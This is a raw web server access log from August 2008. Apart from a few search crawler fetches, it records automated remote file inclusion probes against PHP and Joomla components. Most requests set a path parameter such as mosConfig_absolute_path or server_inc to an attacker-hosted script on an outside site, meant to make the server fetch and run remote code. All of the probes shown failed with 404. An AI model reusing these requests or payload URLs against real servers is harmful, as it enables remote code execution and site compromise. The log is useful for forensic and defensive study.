216.249.32.13 - - [10/Aug/2008:17:50:03 -0600] "GET /logs/access_log.20080504//step_one.php?server_inc=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.65"
216.249.32.13 - - [10/Aug/2008:17:50:19 -0600] "GET /logs//step_one.php?server_inc=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
216.249.32.13 - - [10/Aug/2008:17:50:19 -0600] "GET //step_one.php?server_inc=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
216.249.32.13 - - [10/Aug/2008:17:50:22 -0600] "GET /logs//step_one.php?server_inc=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
216.249.32.13 - - [10/Aug/2008:17:50:22 -0600] "GET //step_one.php?server_inc=http://www.rajacademy.com/shop/blocks/echo.txt?? HTTP/1.1" 404 231 "-" "libwww-perl/5.65"
207.44.244.37 - - [10/Aug/2008:17:51:45 -0600] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 248 "-" "Mozilla/4.61 (Macintosh; I; PPC)"
207.44.244.37 - - [10/Aug/2008:17:51:45 -0600] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
64.49.254.139 - - [10/Aug/2008:17:54:45 -0600] "GET /logs/error_log.20080601//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:17:54:45 -0600] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:17:54:46 -0600] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:17:55:02 -0600] "GET /logs/access_log.20080601//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.79"
210.188.205.31 - - [10/Aug/2008:17:55:39 -0600] "GET /logs/error_log.20080601//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.65"
210.188.205.31 - - [10/Aug/2008:17:55:39 -0600] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.65"
210.188.205.31 - - [10/Aug/2008:17:55:40 -0600] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.65"
64.49.254.139 - - [10/Aug/2008:17:56:21 -0600] "GET /logs/error_log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:17:56:21 -0600] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:17:56:21 -0600] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.79"
210.188.205.31 - - [10/Aug/2008:17:56:24 -0600] "GET /logs/access_log.20080601//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
69.73.189.205 - - [10/Aug/2008:17:56:40 -0600] "GET /logs/error_log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:17:56:40 -0600] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:17:56:41 -0600] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
200.72.251.210 - - [10/Aug/2008:17:56:41 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.luoghidellacultura.it/www//components/com_joomla-visites/cmd.txt?? HTTP/1.1" 404 241 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
200.72.251.210 - - [10/Aug/2008:17:56:41 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.luoghidellacultura.it/www//components/com_joomla-visites/cmd.txt?? HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
72.29.70.187 - - [10/Aug/2008:17:57:11 -0600] "GET /logs/access_log.20080406//skin/zero_vote/ask_password.php?dir=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.812"
72.29.70.187 - - [10/Aug/2008:17:57:11 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.812"
72.29.70.187 - - [10/Aug/2008:17:57:11 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.812"
81.6.204.2 - - [10/Aug/2008:17:57:42 -0600] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
81.6.204.2 - - [10/Aug/2008:17:57:43 -0600] "GET /logs/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 254 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)"
129.142.67.13 - - [10/Aug/2008:17:58:55 -0600] "GET //vwar/convert/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 230 "-" "libwww-perl/5.79"
129.142.67.13 - - [10/Aug/2008:17:58:55 -0600] "GET //vwar/backup/errors.php?error=http://warsector.ru/access2006.log??? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
77.221.130.15 - - [10/Aug/2008:17:59:00 -0600] "GET //convert/mvcw.php?step=1&vwar_root=http://warsector.ru/access2006.log??? HTTP/1.1" 404 223 "-" "libwww-perl/5.803"
117.110.206.130 - - [10/Aug/2008:17:59:38 -0600] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 359 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
210.188.205.31 - - [10/Aug/2008:18:01:01 -0600] "GET /logs/error_log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.65"
210.188.205.31 - - [10/Aug/2008:18:01:01 -0600] "GET //components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 245 "-" "libwww-perl/5.65"
210.188.205.31 - - [10/Aug/2008:18:01:02 -0600] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 250 "-" "libwww-perl/5.65"
219.117.239.114 - - [10/Aug/2008:18:03:00 -0600] "GET /logs/error_log.20080601//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.65"
194.79.75.195 - - [10/Aug/2008:18:05:16 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
194.79.75.195 - - [10/Aug/2008:18:05:16 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
70.85.102.100 - - [10/Aug/2008:18:06:45 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 238 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
70.85.102.100 - - [10/Aug/2008:18:06:46 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
195.5.163.212 - - [10/Aug/2008:18:07:12 -0600] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
195.5.163.212 - - [10/Aug/2008:18:07:12 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 238 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"
74.6.22.151 - - [10/Aug/2008:18:07:47 -0600] "GET /logs/error_log.20080622 HTTP/1.0" 200 6894306 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
219.117.239.114 - - [10/Aug/2008:18:08:21 -0600] "GET /logs/access_log.20080601//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.65"
117.110.206.130 - - [10/Aug/2008:18:08:30 -0600] "GET /logs/error_log/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 374 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
117.110.206.130 - - [10/Aug/2008:18:08:41 -0600] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 359 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
207.44.244.37 - - [10/Aug/2008:18:11:14 -0600] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 238 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)"
207.44.244.37 - - [10/Aug/2008:18:11:14 -0600] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 243 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
81.6.204.2 - - [10/Aug/2008:18:11:55 -0600] "GET /logs/modules/agendax/addevent.inc.php?agendax_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 243 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
81.6.204.2 - - [10/Aug/2008:18:11:56 -0600] "GET /modules/agendax/addevent.inc.php?agendax_path=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/boo.do??? HTTP/1.1" 404 238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b"
88.191.59.190 - - [10/Aug/2008:18:12:48 -0600] "GET /logs/access_log.20080420//index.php?load=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
88.191.59.190 - - [10/Aug/2008:18:12:49 -0600] "GET //index.php?load=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
88.191.59.190 - - [10/Aug/2008:18:12:49 -0600] "GET /logs//index.php?load=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
70.85.201.66 - - [10/Aug/2008:18:13:16 -0600] "GET /logs/error_log.20080406//oneadmin/newspublish/include.php?path[docroot]=http://go4wallpapers.com/babes/id.txt?? HTTP/1.1" 404 263 "-" "libwww-perl/5.811"
70.85.201.66 - - [10/Aug/2008:18:13:16 -0600] "GET //oneadmin/newspublish/include.php?path[docroot]=http://go4wallpapers.com/babes/id.txt?? HTTP/1.1" 404 239 "-" "libwww-perl/5.811"
70.85.201.66 - - [10/Aug/2008:18:13:17 -0600] "GET /logs//oneadmin/newspublish/include.php?path[docroot]=http://go4wallpapers.com/babes/id.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.811"
77.221.130.6 - - [10/Aug/2008:18:13:26 -0600] "GET /logs/access_log.20080420//index.php?load=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 241 "-" "libwww-perl/5.803"
77.221.130.6 - - [10/Aug/2008:18:13:26 -0600] "GET //index.php?load=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 228 "-" "libwww-perl/5.803"
77.221.130.6 - - [10/Aug/2008:18:13:27 -0600] "GET /logs//index.php?load=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 233 "-" "libwww-perl/5.803"
89.111.179.10 - - [10/Aug/2008:18:13:27 -0600] "GET /logs/access_log.20080420//index.php?load=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
89.111.179.10 - - [10/Aug/2008:18:13:27 -0600] "GET //index.php?load=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 228 "-" "libwww-perl/5.805"
89.111.179.10 - - [10/Aug/2008:18:13:28 -0600] "GET /logs//index.php?load=http://www.spanishvida.com/.../rid???? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
200.72.251.210 - - [10/Aug/2008:18:14:13 -0600] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://www.luoghidellacultura.it/www//components/com_joomla-visites/cmd.txt?? HTTP/1.1" 404 231 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
200.72.251.210 - - [10/Aug/2008:18:14:13 -0600] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://www.luoghidellacultura.it/www//components/com_joomla-visites/cmd.txt?? HTTP/1.1" 404 236 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)"
74.6.22.151 - - [10/Aug/2008:18:15:14 -0600] "GET /logs/ HTTP/1.0" 200 5803 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
81.169.158.65 - - [10/Aug/2008:18:17:05 -0600] "GET /logs/error_log.20080601/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/zolahacker/scan.txt? HTTP/1.1" 404 383 "-" "libwww-perl/5.803"
81.169.158.65 - - [10/Aug/2008:18:17:05 -0600] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/zolahacker/scan.txt? HTTP/1.1" 404 359 "-" "libwww-perl/5.803"
81.169.158.65 - - [10/Aug/2008:18:17:05 -0600] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/zolahacker/scan.txt? HTTP/1.1" 404 364 "-" "libwww-perl/5.803"
74.6.22.151 - - [10/Aug/2008:18:17:12 -0600] "GET /logs/error_log.20080810 HTTP/1.0" 200 565248 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.151 - - [10/Aug/2008:18:18:06 -0600] "GET /logs/access_log.20080810 HTTP/1.0" 200 548864 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
70.85.201.66 - - [10/Aug/2008:18:18:33 -0600] "GET /logs/error_log//oneadmin/newspublish/include.php?path[docroot]=http://go4wallpapers.com/babes/id.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.811"
81.169.158.65 - - [10/Aug/2008:18:18:33 -0600] "GET /logs/access_log.20080601/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://members.lycos.co.uk/zolahacker/scan.txt? HTTP/1.1" 404 384 "-" "libwww-perl/5.803"
117.110.206.130 - - [10/Aug/2008:18:20:02 -0600] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 359 "-" "libwww-perl/5.803"
117.110.206.130 - - [10/Aug/2008:18:20:02 -0600] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.rhemachristianschool.org//modules/dds.txt??? HTTP/1.1" 404 359 "-" "libwww-perl/5.803"
66.230.197.245 - - [10/Aug/2008:18:20:51 -0600] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 252 "-" "libwww-perl/5.810"
72.29.70.187 - - [10/Aug/2008:18:21:00 -0600] "GET /logs/error_log.20080427/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.812"
72.29.70.187 - - [10/Aug/2008:18:21:00 -0600] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.812"
72.29.70.187 - - [10/Aug/2008:18:21:00 -0600] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.812"
194.79.75.195 - - [10/Aug/2008:18:21:06 -0600] "GET /logs/error_log//include/admin.php?rd=http://members.lycos.co.uk/zolahacker/id.txt%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
194.79.75.195 - - [10/Aug/2008:18:21:07 -0600] "GET /logs//include/admin.php?rd=http://members.lycos.co.uk/zolahacker/id.txt%0D?? HTTP/1.1" 404 229 "-" "libwww-perl/5.810"
194.79.75.195 - - [10/Aug/2008:18:21:07 -0600] "GET //include/admin.php?rd=http://members.lycos.co.uk/zolahacker/id.txt%0D?? HTTP/1.1" 404 224 "-" "libwww-perl/5.810"
72.29.70.187 - - [10/Aug/2008:18:21:17 -0600] "GET /logs/error_log.20080427/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 285 "-" "libwww-perl/5.812"
72.29.70.187 - - [10/Aug/2008:18:21:18 -0600] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 261 "-" "libwww-perl/5.812"
72.29.70.187 - - [10/Aug/2008:18:21:18 -0600] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 266 "-" "libwww-perl/5.812"
194.79.75.195 - - [10/Aug/2008:18:21:21 -0600] "GET /logs/error_log//include/admin.php?rd=http://members.lycos.co.uk/zolahacker/id.txt%0D?? HTTP/1.1" 404 239 "-" "libwww-perl/5.810"
194.79.75.195 - - [10/Aug/2008:18:21:21 -0600] "GET //include/admin.php?rd=http://members.lycos.co.uk/zolahacker/id.txt%0D?? HTTP/1.1" 404 224 "-" "libwww-perl/5.810"
194.79.75.195 - - [10/Aug/2008:18:21:22 -0600] "GET /logs//include/admin.php?rd=http://members.lycos.co.uk/zolahacker/id.txt%0D?? HTTP/1.1" 404 229 "-" "libwww-perl/5.810"
72.29.70.187 - - [10/Aug/2008:18:21:55 -0600] "GET /logs/access_log.20080427/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 286 "-" "libwww-perl/5.812"
72.29.70.187 - - [10/Aug/2008:18:21:58 -0600] "GET /logs/access_log.20080427/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 286 "-" "libwww-perl/5.812"
67.15.205.17 - - [10/Aug/2008:18:23:04 -0600] "GET /logs/error_log.20080406//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 286 "-" "libwww-perl/5.811"
67.15.205.17 - - [10/Aug/2008:18:23:04 -0600] "GET //redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 262 "-" "libwww-perl/5.811"
67.15.205.17 - - [10/Aug/2008:18:23:04 -0600] "GET /logs//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 267 "-" "libwww-perl/5.811"
67.15.205.17 - - [10/Aug/2008:18:23:46 -0600] "GET /logs/access_log.20080406//redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=http://www.gchp.org/www?????????????????????????? HTTP/1.1" 404 287 "-" "libwww-perl/5.811"
81.169.158.65 - - [10/Aug/2008:18:23:58 -0600] "GET /logs/error_log//step_one.php?server_inc=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
81.169.158.65 - - [10/Aug/2008:18:23:59 -0600] "GET //step_one.php?server_inc=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
81.169.158.65 - - [10/Aug/2008:18:23:59 -0600] "GET /logs//step_one.php?server_inc=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
81.169.158.65 - - [10/Aug/2008:18:23:59 -0600] "GET /logs/error_log.20080504//step_one.php?server_inc=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.803"
81.169.158.65 - - [10/Aug/2008:18:24:00 -0600] "GET /logs/error_log.20080622//step_one.php?server_inc=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.803"
81.169.158.65 - - [10/Aug/2008:18:24:07 -0600] "GET /logs/error_log//step_one.php?server_inc=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
81.169.158.65 - - [10/Aug/2008:18:24:07 -0600] "GET //step_one.php?server_inc=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 231 "-" "libwww-perl/5.803"
81.169.158.65 - - [10/Aug/2008:18:24:07 -0600] "GET /logs//step_one.php?server_inc=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
81.169.158.65 - - [10/Aug/2008:18:24:07 -0600] "GET /logs/error_log.20080504//step_one.php?server_inc=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.803"
81.169.158.65 - - [10/Aug/2008:18:24:09 -0600] "GET /logs/error_log.20080622//step_one.php?server_inc=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.803"
81.169.158.65 - - [10/Aug/2008:18:24:12 -0600] "GET /logs/access_log.20080622//step_one.php?server_inc=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
81.169.158.65 - - [10/Aug/2008:18:24:13 -0600] "GET /logs/access_log.20080504//step_one.php?server_inc=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
81.169.158.65 - - [10/Aug/2008:18:24:20 -0600] "GET /logs/access_log.20080622//step_one.php?server_inc=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
81.169.158.65 - - [10/Aug/2008:18:24:20 -0600] "GET /logs/access_log.20080504//step_one.php?server_inc=http://www.123socios.com//cache/gd-bot-id.txt???? HTTP/1.1" 404 244 "-" "libwww-perl/5.803"
195.5.163.212 - - [10/Aug/2008:18:25:15 -0600] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
64.49.254.139 - - [10/Aug/2008:18:27:27 -0600] "GET /logs/error_log/common/db.php?commonpath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:18:27:27 -0600] "GET /common/db.php?commonpath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.79"
64.49.254.139 - - [10/Aug/2008:18:27:27 -0600] "GET /logs/common/db.php?commonpath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
69.73.189.205 - - [10/Aug/2008:18:28:53 -0600] "GET /logs/error_log/common/db.php?commonpath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:18:28:53 -0600] "GET /common/db.php?commonpath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:18:28:53 -0600] "GET /logs/common/db.php?commonpath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:18:28:58 -0600] "GET /logs/error_log/common/db.php?commonpath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:18:28:58 -0600] "GET /common/db.php?commonpath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:18:28:58 -0600] "GET /logs/common/db.php?commonpath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
69.73.189.205 - - [10/Aug/2008:18:29:24 -0600] "GET /logs/access_log.20080622/admincp/auth/checklogin.php?cfgProgDir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 258 "-" "libwww-perl/5.805"
